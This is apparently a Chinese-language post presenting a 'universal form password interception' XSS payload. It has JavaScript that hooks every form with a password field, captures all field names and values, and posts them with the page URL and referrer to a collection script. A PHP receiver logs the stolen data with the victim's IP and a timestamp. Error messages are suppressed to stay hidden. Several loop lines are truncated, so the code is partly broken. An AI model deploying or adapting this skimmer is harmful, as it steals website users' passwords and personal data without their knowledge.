功能:
(整个表单里如果没找到的框框则不截获,如果找到则截获所有input里的value。)/***************
通用截获form密码
IE, chrome通过测试
作者 Spider
****************/
function Send_Data(url,ref,datas) {
var xmlhttp = false;
//更高效地获取XMLhttp对象
if(window.XMLHttpRequest) {
xmlhttp = new XMLHttpRequest();
if(xmlhttp.overrideMimeType) { xmlhttp.overrideMimeType('text/xml'); }
} else if(window.ActiveXObject) {
var xmlobj = ['Microsoft.XMLHTTP','MSXML.XMLHTTP','Msxml2.XMLHTTP.8.0','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'];
for(var i = 0;i
}
if(!xmlhttp) { return false; }
//接收截获数据地址(跨域方法百度找)
var sjurl = 'http://localhost/door/get/xss.php';
//$_POST['url']-当前地址,$_POST['ref']-来路,$_POST['data']-截获的数据
var sjpos = 'var=xss&url='+escape(url)+'&ref='+escape(ref)+'&data='+escape(datas);
//POST方法提交数据
xmlhttp.open("POST", sjurl, true);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length",sjpos.length);
xmlhttp.setRequestHeader("Connection","close");
xmlhttp.send(sjpos);
return true;
}
function Form_Hijack(thisform) {
var ispwd = false;
//查找form里是否含有输入密码的框框
for(var k = 0;k
var sjobj = thisform.elements[k]; if(sjobj.type == 'password') { ispwd = true; break; }
}
//如果没有输入密码的框框则不截获
if(!ispwd) { return true; }
var sjurl = window.location;
var sjref = document.referrer;
//如果运行在子窗口
if(window.parent.location) { sjurl = window.parent.location; }
if(top.document.referrer) { sjref = top.document.referrer; }
else if(window.parent.document.referrer) { sjref = window.parent.document.referrer; }
var sjdata = '';
for(var j = 0;j
var sjobj = thisform.elements[j];
//过滤掉不重要的对象
if(sjobj.type != 'button' && sjobj.type != 'submit' && sjobj.type != 'hidden' && sjobj.type != 'image') {
//框框的名字(name="") 数据(value="")
sjdata += sjobj.name+':'+sjobj.value+' --- ';
}
}
//如果截获成功就发送
if(sjurl && sjdata) { Send_Data(sjurl,sjref,sjdata); }
return true;
}
function Start_Hijack() {
if(document.getElementsByTagName) {
//开始遍历form表单
var sjform = document.getElementsByTagName("form");
//劫持所有form表单的提交事件
for(var i = 0;i
}
return true;
}
//不显示网页错误
window.onerror = function() { return true; }
//页面加载完毕才开始截获
document.onreadystatechange = function() {
//让子弹飞一会
if(document.readyState == "complete") { setTimeout('Start_Hijack()',1000); }
}
补充:- 低调求发展6 h7 @ G1 | v8 V- ^% a
记录截获数据php文件
/***************
通用截获form密码 php接收文件
作者 Spider
****************/
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
//保存数据的文件
$logfile = './xss.txt';
function filew($filename,$filedata,$filemode) {
$handle = fopen($filename,$filemode);
$key = fputs($handle,$filedata);
fclose($handle);
return $key;
}
function filer($filename,$filesize = 0) {
$filesize = $filesize ? $filesize : filesize($filename);
$handle = fopen($filename,'r');
$filedata = fread($handle,$filesize);
fclose($handle);
return $filedata;
}
function checkgpc($array) {
foreach($array as $key => $var) { $array[$key] = is_array($var) ? checkgpc($var) : stripslashes($var); }
return $array;
}
if(get_magic_quotes_gpc()) { $_POST = checkgpc($_POST); }
if(isset($_POST['url']) && isset($_POST['ref']) && isset($_POST['data'])) {
if(strlen($_POST['url']) > 500 || strlen($_POST['ref']) > 500 || strlen($_POST['data']) > 1000) { exit('数据太大不正常'); }
$temp = filer($logfile);
$data = $_POST['url'].'●'.$_POST['ref'].'●'.$_POST['data'];
//是否重复记录
if(strpos($temp,$data) > -1) { exit('重复记录'); }
//来路IP
$reip = '●'.$_SERVER["REMOTE_ADDR"];
//时间
$time = '●'.date('Y-m-d H:i',time());
filew($logfile,$data.$reip.$time."\r\n",'w');
}
?>